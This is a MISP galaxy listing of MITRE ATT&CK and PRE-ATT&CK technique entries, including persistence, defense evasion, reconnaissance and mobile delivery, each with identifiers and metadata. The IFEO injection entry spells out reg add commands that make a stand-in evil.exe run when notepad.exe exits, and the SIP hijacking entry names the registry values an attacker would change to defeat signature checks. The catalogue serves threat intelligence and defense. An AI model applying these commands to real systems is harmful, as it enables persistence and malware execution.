Infrastructure services includes the hardware, software, and network resources required to operate a communications environment. This infrastructure can be managed by a 3rd party rather than being managed by the owning organization. (Citation: FFIECAwareness) (Citation: Zetter2015Threats)

Internal MISP references

UUID 856a9371-4f0f-4ea9-946e-f3144204240f which can be used as unique global reference for Determine 3rd party infrastructure services - T1260 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1260
kill_chain ['pre-attack:technical-information-gathering']
Related clusters

To see the related clusters, click here.

Analyze presence of outsourced capabilities - T1303

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Outsourcing, the arrangement of one company providing goods or services to another company for something that could be done in-house, provides another avenue for an adversary to target. Businesses often have networks, portals, or other technical connections between themselves and their outsourced/partner organizations that could be exploited. Additionally, outsourced/partner organization information could provide opportunities for phishing. (Citation: Scasny2015) (Citation: OPM Breach)

Internal MISP references

UUID 34450117-d1d5-417c-bb74-4359fc6551ca which can be used as unique global reference for Analyze presence of outsourced capabilities - T1303 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1303
kill_chain ['pre-attack:organizational-weakness-identification']

Boot or Logon Initialization Scripts - T1037

Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.(Citation: Mandiant APT29 Eye Spy Email Nov 22)(Citation: Anomali Rocke March 2019) Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.

Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.

Internal MISP references

UUID 03259939-0b57-482f-8eb5-87c0e0d54334 which can be used as unique global reference for Boot or Logon Initialization Scripts - T1037 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1037
kill_chain ['attack-macOS:persistence', 'attack-Windows:persistence', 'attack-Linux:persistence', 'attack-Network:persistence', 'attack-macOS:privilege-escalation', 'attack-Windows:privilege-escalation', 'attack-Linux:privilege-escalation', 'attack-Network:privilege-escalation']
mitre_data_sources ['Active Directory: Active Directory Object Modification', 'Command: Command Execution', 'File: File Creation', 'File: File Modification', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Creation']
mitre_platforms ['macOS', 'Windows', 'Linux', 'Network']

Data from Network Shared Drive - T1039

Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information.

Internal MISP references

UUID ae676644-d2d2-41b7-af7e-9bed1b55898c which can be used as unique global reference for Data from Network Shared Drive - T1039 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1039
kill_chain ['attack-Linux:collection', 'attack-macOS:collection', 'attack-Windows:collection']
mitre_data_sources ['Command: Command Execution', 'File: File Access', 'Network Share: Network Share Access', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
mitre_platforms ['Linux', 'macOS', 'Windows']

Download New Code at Runtime - T1407

Adversaries may download and execute dynamic code not included in the original application package after installation. This technique is primarily used to evade static analysis checks and pre-publication scans in official app stores. In some cases, more advanced dynamic or behavioral analysis techniques could detect this behavior. However, in conjunction with Execution Guardrails techniques, detecting malicious code downloaded after installation could be difficult.

On Android, dynamic code could include native code, Dalvik code, or JavaScript code that utilizes Android WebView’s JavascriptInterface capability.

On iOS, dynamic code could be downloaded and executed through 3rd party libraries such as JSPatch. (Citation: FireEye-JSPatch)

Internal MISP references

UUID 6c49d50f-494d-4150-b774-a655022d20a6 which can be used as unique global reference for Download New Code at Runtime - T1407 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1407
kill_chain ['mobile-attack-Android:defense-evasion', 'mobile-attack-iOS:defense-evasion']
mitre_platforms ['Android', 'iOS']

Windows Management Instrumentation Event Subscription - T1084

Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts into Windows Management Object (MOF) files (.mof extension). (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)

Internal MISP references

UUID e906ae4d-1d3a-4675-be23-22f7311c0da4 which can be used as unique global reference for Windows Management Instrumentation Event Subscription - T1084 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1084
kill_chain ['attack-Windows:persistence']
mitre_platforms ['Windows']
Related clusters

To see the related clusters, click here.

Custom Command and Control Protocol - T1094

Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing Application Layer Protocol. Implementations include mimicking well-known protocols or developing custom protocols (including raw sockets) on top of fundamental protocols provided by TCP/IP/another standard network stack.

Internal MISP references

UUID f72eb8a8-cd4c-461d-a814-3f862befbf00 which can be used as unique global reference for Custom Command and Control Protocol - T1094 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1094
kill_chain ['attack-Linux:command-and-control', 'attack-macOS:command-and-control', 'attack-Windows:command-and-control']
mitre_platforms ['Linux', 'macOS', 'Windows']
Related clusters

To see the related clusters, click here.

Trusted Developer Utilities Proxy Execution - T1127

Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.

Internal MISP references

UUID ff25900d-76d5-449b-a351-8824e62fc81b which can be used as unique global reference for Trusted Developer Utilities Proxy Execution - T1127 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1127
kill_chain ['attack-Windows:defense-evasion']
mitre_data_sources ['Command: Command Execution', 'Process: Process Creation']
mitre_platforms ['Windows']

App Delivered via Web Download - T1431

The application is downloaded from an arbitrary web site. A link to the application's download URI may be sent in an email or SMS, placed on another web site that the target is likely to view, or sent via other means (such as QR code).

Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted, known insecure, or malicious apps on devices.

Platforms: Android, iOS

Internal MISP references

UUID 6b846ad0-cc20-4db6-aa34-91561397c5e2 which can be used as unique global reference for App Delivered via Web Download - T1431 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1431
Related clusters

To see the related clusters, click here.

Image File Execution Options Injection - T1183

Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., “C:\dbg\ntsd.exe -g notepad.exe”). (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)

An example where the evil.exe process is started when notepad.exe exits: (Citation: Oddvar Moe IFEO APR 2018)

  • reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
  • reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
  • reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"

Similar to Process Injection, these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous invocation.

Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)

Internal MISP references

UUID 62166220-e498-410f-a90a-19d4339d4e99 which can be used as unique global reference for Image File Execution Options Injection - T1183 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1183
kill_chain ['attack-Windows:privilege-escalation', 'attack-Windows:persistence', 'attack-Windows:defense-evasion']
mitre_platforms ['Windows']
Related clusters

To see the related clusters, click here.

SIP and Trust Provider Hijacking - T1198

In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)

Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)

Similar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)

  • Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
  • Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[WOW6432Node]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
  • Modifying the DLL and Function Registry values in HKLM\SOFTWARE[WOW6432Node]Microsoft\Cryptography\Providers\Trust\FinalPolicy{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
  • Note: The above hijacks are also possible without modifying the Registry via DLL Search Order Hijacking.

Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)

Internal MISP references

UUID 72b5ef57-325c-411b-93ca-a3ca6fa17e31 which can be used as unique global reference for SIP and Trust Provider Hijacking - T1198 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1198
kill_chain ['attack-Windows:defense-evasion', 'attack-Windows:persistence']
mitre_platforms ['Windows']
Related clusters

To see the related clusters, click here.

File and Directory Permissions Modification - T1222

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, Unix Shell Configuration Modification, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.

Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior)

Internal MISP references

UUID 65917ae0-b854-4139-83fe-bf2441cf0196 which can be used as unique global reference for File and Directory Permissions Modification - T1222 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1222
kill_chain ['attack-Linux:defense-evasion', 'attack-Windows:defense-evasion', 'attack-macOS:defense-evasion']
mitre_data_sources ['Active Directory: Active Directory Object Modification', 'Command: Command Execution', 'File: File Metadata', 'Process: Process Creation']
mitre_platforms ['Linux', 'Windows', 'macOS']

Assess leadership areas of interest - T1224

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Leadership assesses the areas of most interest to them and generates Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ). For example, an adversary knows from open and closed source reporting that cyber is of interest, resulting in it being a KIT. (Citation: ODNIIntegration)

Internal MISP references

UUID d3999268-740f-467e-a075-c82e2d04be62 which can be used as unique global reference for Assess leadership areas of interest - T1224 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1224
kill_chain ['pre-attack:priority-definition-planning']

Determine 3rd party infrastructure services - T1284

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available as 3rd party infrastructure services. These services could provide an adversary with another avenue of approach or compromise. (Citation: LUCKYCAT2012) (Citation: Schneier-cloud) (Citation: Computerworld-suppliers)

Internal MISP references

UUID dfa4eaf4-50d9-49de-89e9-d33f579f3e05 which can be used as unique global reference for Determine 3rd party infrastructure services - T1284 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1284
kill_chain ['pre-attack:organizational-information-gathering']
Related clusters

To see the related clusters, click here.

Determine highest level tactical element - T1243

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

From a tactical viewpoint, an adversary could potentially have a primary and secondary level target. The primary target represents the highest level tactical element the adversary wishes to attack. For example, the corporate network within a corporation or the division within an agency. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

Internal MISP references

UUID dc7dfc9f-be1b-4e6e-a2e6-9a9bb2400ec9 which can be used as unique global reference for Determine highest level tactical element - T1243 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1243
kill_chain ['pre-attack:target-selection']

Determine secondary level tactical element - T1244

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

The secondary level tactical element the adversary seeks to attack is the specific network or area of a network that is vulnerable to attack. Within the corporate network example, the secondary level tactical element might be a SQL server or a domain controller with a known vulnerability. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

Internal MISP references

UUID b9148981-152a-4a19-95c1-962803f5c9af which can be used as unique global reference for Determine secondary level tactical element - T1244 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1244
kill_chain ['pre-attack:target-selection']

Attack PC via USB Connection - T1427

With escalated privileges, an adversary could program the mobile device to impersonate USB devices such as input devices (keyboard and mouse), storage devices, and/or networking devices in order to attack a physically connected PC(Citation: Wang-ExploitingUSB)(Citation: ArsTechnica-PoisonTap) This technique has been demonstrated on Android. We are unaware of any demonstrations on iOS.

Internal MISP references

UUID a0464539-e1b7-4455-a355-12495987c300 which can be used as unique global reference for Attack PC via USB Connection - T1427 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1427
kill_chain ['mobile-attack-Android:lateral-movement']
mitre_platforms ['Android']

Determine centralization of IT management - T1285

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Determining if a "corporate" help desk exists, the degree of access and control it has, and whether there are "edge" units that may have different support processes and standards. (Citation: SANSCentratlizeManagement)

Internal MISP references

UUID a7dff5d5-99f9-4a7e-ac54-a64113c28121 which can be used as unique global reference for Determine centralization of IT management - T1285 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1285
kill_chain ['pre-attack:organizational-information-gathering']

Determine external network trust dependencies - T1259

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Network trusts enable communications between different networks with specific accesses and permissions. Network trusts could include the implementation of domain trusts or the use of virtual private networks (VPNs). (Citation: CuckoosEgg) (Citation: CuckoosEggWikipedia) (Citation: KGBComputerMe)

Internal MISP references

UUID a2fc93cd-e371-4755-9305-2615b6753d91 which can be used as unique global reference for Determine external network trust dependencies - T1259 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1259
kill_chain ['pre-attack:technical-information-gathering']

Analyze organizational skillsets and deficiencies - T1297

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Understanding organizational skillsets and deficiencies could provide insight in to weakness in defenses, or opportunities for exploitation. (Citation: FakeLinkedIn)

Internal MISP references

UUID 96eb59d1-6c46-44bb-bfcd-56be02a00d41 which can be used as unique global reference for Analyze organizational skillsets and deficiencies - T1297 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1297
kill_chain ['pre-attack:people-weakness-identification']
Related clusters

To see the related clusters, click here.

Analyze architecture and configuration posture - T1288

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

An adversary may analyze technical scanning results to identify weaknesses in the configuration or architecture of a victim network. These weaknesses could include architectural flaws, misconfigurations, or improper security controls. (Citation: FireEyeAPT28)

Internal MISP references

UUID 87775365-2081-4b6e-99bd-48a3b8f36563 which can be used as unique global reference for Analyze architecture and configuration posture - T1288 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1288
kill_chain ['pre-attack:technical-weakness-identification']

Analyze organizational skillsets and deficiencies - T1289

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Analyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts. (Citation: FakeLinkedIn)

Internal MISP references

UUID 092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc which can be used as unique global reference for Analyze organizational skillsets and deficiencies - T1289 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1289
kill_chain ['pre-attack:technical-weakness-identification']
Related clusters

To see the related clusters, click here.

Leverage compromised 3rd party resources - T1375

This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.

The utilization of resources not owned by the adversary to launch exploits or operations. This includes utilizing equipment that was previously compromised or leveraging access gained by other methods (such as compromising an employee at a business partner location). (Citation: CitizenLabGreatCannon)

Internal MISP references

UUID 2c8a9df4-52a9-4770-94b3-5e95ab7d59f9 which can be used as unique global reference for Leverage compromised 3rd party resources - T1375 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1375
kill_chain ['pre-attack:launch']

Procure required equipment and software - T1335

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

An adversary will require some physical hardware and software. They may only need a lightweight set-up if most of their activities will take place using on-line infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems. (Citation: NYTStuxnet)

Internal MISP references

UUID 2141aea0-cf38-49aa-9e51-ac34092bc30a which can be used as unique global reference for Procure required equipment and software - T1335 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1335
kill_chain ['pre-attack:establish-&-maintain-infrastructure']

SSL certificate acquisition for domain - T1337

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. Acquiring a certificate for a domain name similar to one that is expected to be trusted may allow an adversary to trick a user in to trusting the domain (e.g., vvachovia instead of Wachovia -- homoglyphs). (Citation: SubvertSSL) (Citation: PaypalScam)

Internal MISP references

UUID e34b9ca1-8778-41a3-bba5-8edaab4076dc which can be used as unique global reference for SSL certificate acquisition for domain - T1337 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1337
kill_chain ['pre-attack:establish-&-maintain-infrastructure']

Confirmation of launched compromise achieved - T1383

This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.

Upon successful compromise the adversary may implement methods for confirming success including communication to a command and control server, exfiltration of data, or a verifiable intended effect such as a publicly accessible resource being inaccessible or a web page being defaced. (Citation: FireEye Malware Stages) (Citation: APTNetworkTrafficAnalysis)

Internal MISP references

UUID f4c5d1d9-8f0e-46f1-a9fa-f9a440926046 which can be used as unique global reference for Confirmation of launched compromise achieved - T1383 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1383
kill_chain ['pre-attack:compromise']

App Delivered via Email Attachment - T1434

The application is delivered as an email attachment.

Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted, known insecure, or malicious apps on devices. Enterprise email security solutions can identify the presence of Android or iOS application packages within email messages.

Platforms: Android, iOS

Internal MISP references

UUID 1f96d624-8409-4472-ad8a-30618ee6b2e2 which can be used as unique global reference for App Delivered via Email Attachment - T1434 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1434
Related clusters

To see the related clusters, click here.

Create or Modify System Process - T1543

Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as Launch Daemon and Launch Agent are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons)

Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.

Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.(Citation: OSX Malware Detection)

Internal MISP references

UUID 106c0cf6-bf73-4601-9aa8-0945c2715ec5 which can be used as unique global reference for Create or Modify System Process - T1543 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1543
kill_chain ['attack-Windows:persistence', 'attack-macOS:persistence', 'attack-Linux:persistence', 'attack-Containers:persistence', 'attack-Windows:privilege-escalation', 'attack-macOS:privilege-escalation', 'attack-Linux:privilege-escalation', 'attack-Containers:privilege-escalation']
mitre_data_sources ['Command: Command Execution', 'Container: Container Creation', 'Driver: Driver Load', 'File: File Creation', 'File: File Modification', 'Process: OS API Execution', 'Process: Process Creation', 'Service: Service Creation', 'Service: Service Modification', 'Windows Registry: Windows Registry Key Creation', 'Windows Registry: Windows Registry Key Modification']
mitre_platforms ['Windows', 'macOS', 'Linux', 'Containers']

Build and configure delivery systems - T1347

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Delivery systems are the infrastructure used by the adversary to host malware or other tools used during exploitation. Building and configuring delivery systems may include multiple activities such as registering domain names, renting hosting space, or configuring previously exploited environments. (Citation: APT1)

Internal MISP references

UUID 15ef4da5-3b93-4bb1-a39a-5396661956d3 which can be used as unique global reference for Build and configure delivery systems - T1347 in MISP communities and other software using the MISP galaxy

External references